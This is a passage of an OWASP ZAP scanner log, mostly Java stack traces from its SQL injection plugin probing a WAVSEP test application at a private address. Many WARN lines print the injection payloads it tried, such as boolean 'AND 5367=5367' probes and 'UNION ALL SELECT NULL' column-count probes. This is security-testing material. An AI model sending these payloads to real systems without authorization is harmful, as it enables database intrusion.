at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679798 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5379=5379] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5379=5379 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679799 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9507=6322] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9507=6322 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679799 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679801 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6710=1622 AND ('lPHq'='lPHq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6710=1622 AND ('lPHq'='lPHq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679801 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679802 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 1515=1515 AND ('tJCh'='tJCh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 1515=1515 AND ('tJCh'='tJCh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679806 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679809 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6710=1622 AND ('lPHq'='lPHq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6710=1622 AND ('lPHq'='lPHq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679810 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679811 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679816 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2885=9852 AND 'AxbI'='AxbI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2885=9852 AND 'AxbI'='AxbI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679816 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679817 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5367=5367 AND 'REEH'='REEH] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5367=5367 AND 'REEH'='REEH at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 